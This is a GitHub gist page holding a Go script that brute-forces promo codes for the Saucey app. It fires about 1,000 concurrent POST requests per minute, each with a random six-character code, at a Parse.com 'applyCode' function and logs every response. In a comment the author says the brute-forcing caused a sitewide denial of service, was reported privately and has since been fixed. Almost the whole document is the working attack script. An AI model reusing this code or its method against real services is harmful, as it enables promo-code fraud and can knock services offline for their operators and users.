Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Bruteforce saucey promocodes
package main
import (
"bytes"
log "github.com/Sirupsen/logrus"
"io/ioutil"
"math/rand"
"net/http"
"sync"
"time"
)
func req() {
const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890"
b := make([]byte, 6)
for i := range b {
b[i] = letterBytes[rand.Intn(len(letterBytes))]
}
url := "https://api.parse.com/1/functions/applyCode"
var jsonStr = []byte(`{"promoCode":"` + string(b[:6]) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`)
req, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr))
req.Header.Set("X-Custom-Header", "myvalue")
req.Header.Set("Content-Type", "application/json")
client := &http.Client{}
resp, err := client.Do(req)
if err != nil {
log.Error(err.Error())
}
defer resp.Body.Close()
//fmt.Println("response Status:", resp.Status)
//fmt.Println("response Headers:", resp.Header)
body, _ := ioutil.ReadAll(resp.Body)
log.Info(string(body))
}
func main() {
for {
wg := sync.WaitGroup{}
// try not to exceed parse.com api ratelimiting
for i := 1; i < 1000; i++ {
go func() {
wg.Add(1)
defer wg.Done()
req()
}()
}
wg.Wait()
time.Sleep(60 * time.Second)
}
}
@dan-compton

This comment has been minimized.

Copy link
Owner Author

dan-compton commented Nov 12, 2015

Bruteforcing sauceyapp promocodes cased a sitewide DOS due to global API ratelimiting. This issue was reported privately and fixed a while back.

@dan-compton

This comment has been minimized.

Copy link
Owner Author

dan-compton commented Nov 12, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.